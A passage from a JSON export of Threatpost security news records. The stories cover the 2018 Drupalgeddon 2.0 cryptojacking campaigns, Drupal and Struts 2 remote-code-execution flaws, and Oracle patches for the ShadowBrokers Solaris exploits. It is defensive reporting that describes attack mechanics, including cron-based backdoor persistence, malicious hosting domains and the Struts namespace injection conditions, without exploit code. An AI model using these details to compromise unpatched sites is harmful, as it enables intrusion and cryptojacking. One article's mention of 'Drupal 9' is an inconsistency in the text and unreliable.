\u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. They achieve this through adding the malicious JavasSript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120202/kitty-31.png>)\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disc.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120017/kitty-1.png>)\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/05/03120100/kitty-2.png>)\n\nResearchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. \u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. As of June, in fact, more than More than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d A Make-A-Wish spokesperson told Threatpost. \u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. This is especially true of smaller sites, who might use cryptomining in a legitimate source of income but whose ability to secure their website might also be limited putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in [May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. Also, a [botnet ](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>)dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. \u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Also impacted is Drupal 6 and 8.3.x and 8.4.x releases, said Drupal.\n\n\u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned the MIRTE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). There is no known public exploit code in the wild and no reports of the vulnerability being exploited.\n\nThe flaw is described as \u201can input validation issue where invalid query parameters could be passed into Drupal webpages,\u201d said Tim Mackey, technology evangelist at Black Duck by Synopsys.\n\nMeanwhile, several Drupal specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security oriented content delivery network services, CloudFlare and Fastly, have also rolled-out solutions to help protect customers.\n\n\u201cThe only effective mitigation we are advising is to upgrade or second best is to put a rule into a WAF,\u201d said Greg Knaddison, a Drupal security team member and product engineer and Card.com.\n\nKnaddison said it\u2019s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said, Drupal is not releasing any of the technical aspects of the vulnerability other than the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this a blunt solution to the problem and not fixing the specific vulnerable code. But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "cvss3": {}, "published": "2018-03-29T15:58:28", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-09-07T08:18:49", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. According to the advisory, when using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. When untrusted input is not sanitized correctly that could lead to remote code execution.\n\nThis glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.\n\nA second remote code execution bug, reported by Nick Booher, exists in Drupal 9\u2019s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page \u2013 without having to navigating to the Admin Dashboard.\n\nHowever, the Contextual Links module doesn\u2019t sufficiently validate the requested contextual links. That means that an attacker could launch a remote code execution attack in these links.\n\nOne upside is that an attacker would need certain existing permissions: \u201cthis vulnerability is mitigated by the fact that an attacker must have a role with the permission \u2018access contextual links,'\u201d Drupal said.\n\nDrupal also acknowledged three other \u201cmoderately critical\u201d bugs in its advisory.\n\nThe first is an access bypass bug in the content moderation tool in Drupal 8. Essentially, in some conditions, content moderation fails to check a users\u2019 access to use certain transitions \u2013 potentially allowing access bypass.\n\nAnother open redirect vulnerability in Drupal 7 and 8 allows and external URL injection through URL aliases.\n\nThe path module allows users with the \u2018administer paths\u2019 to create pretty URLs for content \u2013 and that means that \u201cIn certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,\u201d Drupal said.\n\nThe issue is mitigated by the fact that the user needs the administer paths permission to exploit, Drupal said.\n\nFinally, a \u201cmoderately critical\u201d bug in Drupal\u2019s redirect process allows bad actors to trick users to visiting third party websites.\n\nAccording to Drupal, Drupal core and contributed modules frequently use a \u201cdestination\u201d query string parameter in URLs to redirect users to a new destination after completing an action on the current page.\n\n\u201cUnder certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,\u201d said Drupal.\n\nAll bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.\n\n\u201cMinor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites running older versions should update to the above 8.5.x release immediately. 8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6,7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "cvss3": {}, "published": "2018-10-20T17:09:46", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the &lt;action \u2026&gt; tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside &lt;result&gt; tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an &lt;action&gt; tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an &lt;s:url \u2026&gt; tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. &lt;action namespace=\u201dmain\u201d&gt;), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public 